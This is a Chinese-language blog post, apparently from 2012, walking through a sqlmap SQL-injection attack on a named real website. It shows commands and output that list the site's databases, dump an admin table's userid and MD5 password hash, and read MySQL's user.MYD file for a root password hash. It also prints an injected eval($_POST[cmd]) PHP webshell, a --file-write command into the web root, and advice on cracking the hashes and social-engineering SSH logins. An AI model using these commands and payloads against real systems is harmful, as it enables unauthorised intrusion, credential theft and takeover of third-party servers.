執行個體sqlmap進行mysql注入root權限讀寫檔案
(2012-08-02 16:01:33)
注解: 1.在BT5 R2下 sqlmap安裝路徑為[email protected]:/pentest/database/sqlmap# 也可以通過啟動快捷方式啟動sqlmap [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*擷取目前使用者和目前資料庫 傳回結果 : [02:42:20] [INFO] fetching current user current user: '[email protected]' [02:42:21] [INFO] fetching current database current database: 'wepost' 這一句話指令代表的意思是:python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 看結果可以也可以知道 目前使用者為 root 目前資料庫為 wepost ------------------------ [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbs -v 2 /*擷取所有資料庫 傳回結果 : available databases [8]: [*] bb [*] cart [*] information_schema [*] mysql [*] taipotour [*] test [*] wepost [*] wepost2 看結果可以也可以知道 目前存在8個資料庫 -------------------------- [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --tables -D wepost -v 2 /*擷取wepost資料庫(也就是目前資料庫)的所有表名 傳回結果 : Database: wepost [6 tables] +-------------+ | admin | | article | | contributor | | idea | | image | | issue | +-------------+ 看結果可以也可以知道 存在6個表 -------------------- [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --columns -D wepost -T admin -v 2 /*擷取wepost資料庫裡admin表的字段 傳回結果 : Database: wepost Table: admin [4 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(11) | | password | varchar(32) | | type | varchar(10) | | userid | varchar(20) | +----------+-------------+ 看結果可以也可以知道 存在4個字段 ---------------------------- [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dump -D "wepost" -T "admin" -C "userid,password" -s "sqlnmapdb.log" -v -v 2 /*擷取wepost資料庫裡 admin表裡 userid和password字段裡面的内容 并将資料儲存下來 /pentest/database/sqlmap/output/www.wepost.com.hk 傳回結果 : Database: wepost Table: admin [1 entry] +----------------------------------+------------+ | password | userid | +----------------------------------+------------+ | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 | +----------------------------------+------------+ [03:08:51] [INFO] Table 'wepost.admin' dumped to CSV file '/pentest/database/sqlmap/output/www.wepost.com.hk/dump/wepost/admin.csv' [03:08:51] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.wepost.com.hk' 得到帳号密碼| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 | 破MD5找背景去把 mysql既然是root權限 當然可以試着寫shell或者讀檔案 (一般讀都是讀apache配置檔案找網站路徑 網站配置檔案擷取root密碼嘗試社工直接登入linux的ssh或者登入phpmyadmin登入執行sql語句寫shell 或者讀其他銘感資訊) root權限寫shell的3個條件: 1、知道站點實體路徑 2、有足夠大的權限(可以用select …. from mysql.user測試) 3、magic_quotes_gpc()=OFF 新版本的 php 已經将預設的值改為了 On 開啟時 當magic_quotes_gpc = On 時,它會将送出的變量中所有的 '(單引号)、"(雙号号)、\(反斜線)、空白字元,都為在前面自動加上 \ 進行轉義 如何判斷 : 1.工具穿山甲 2.and '1'='1' 正常傳回就是off,出錯就是on 條件達到之後 直接注入點後 方法1: http://www.wepost.com.hk/article.php?id=276 select ‘<?php eval_r($_POST[cmd])?>’ into outfile ‘實體路徑’ 方法2: http://www.wepost.com.hk/article.php?id=276 and 1=2 union all select 一句話HEX值 into outfile '實體路徑' 當magic_quotes_gpc = On 時 嘗試讀檔案 讀到root密碼之後找phpmyadmin寫shell 讀linux使用者 目标系統為2003的 http://www.wepost.com.hk/article.php?id=276 and 1=2 union select 1,2,3,4,5,@@datadir,7,8,9-- 傳回mysql路徑 c:\wamp\bin\mysql\mysql5.1.36\data\mysql\user.MYD 補充完整的路徑讀取root密碼 6.root權限讀檔案 [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --file-read "c:\wamp\bin\mysql\mysql5.1.36\data\mysql\user.MYD" -v 2 傳回結果: c:/wamp/bin/mysql/mysql5.1.36/data/mysql/user.MYD file saved to: '/pentest/database/sqlmap/output/www.wepost.com.hk/files/c__wamp_bin_mysql_mysql5.1.36_data_mysql_user.MYD' [03:38:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.wepost.com.hk' 儲存到了/pentest/database/sqlmap/output/www.wepost.com.hk/files/c__wamp_bin_mysql_mysql5.1.36_data_mysql_user.MYD 這裡了 [email protected]:~# cd /pentest/database/sqlmap/output/www.wepost.com.hk/files/ [email protected]:/pentest/database/sqlmap/output/www.wepost.com.hk/files# cat c__wamp_bin_mysql_mysql5.1.36_data_mysql_user.MYD 用cat檢視得到的内容: --------------------------------------------------------------------------------------- / localhostroot/ 127.0.0.1root �DA7DC67ED2CA2AD9V'h% worldgazers*6BB4837EB74329105EE456 X localhosthonoh*[email protected]:/ --------------------------------------------------------------------------------------- 用head檢視到的内容: [email protected]:/pentest/database/sqlmap/output/www.wepost.com.hk/files# head c__wamp_bin_mysql_mysql5.1.36_data_mysql_user.MYD / localhostroot/ 127.0.0.1root �DA7DC67ED2CA2AD9V'h% worldgazers*6BB4837EB74329105EE456 X localhosthonoh*[email protected]:/pentest/database/sqlmap/output/www.wepost.com.hk/files# 得到40位root密碼 CFD1B60A4C68631E4EA4B2ABA1CBD17E301B0454 拿去解密 之後嘗試社工 或者找phpmyadmin寫shell --------------------------------------------------------------------------------- 6.file-write寫入檔案到web sqlmap -u http://www.123.com/test.php?cid=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2 ?
分享:
喜歡
贈金筆
加載中,請稍候......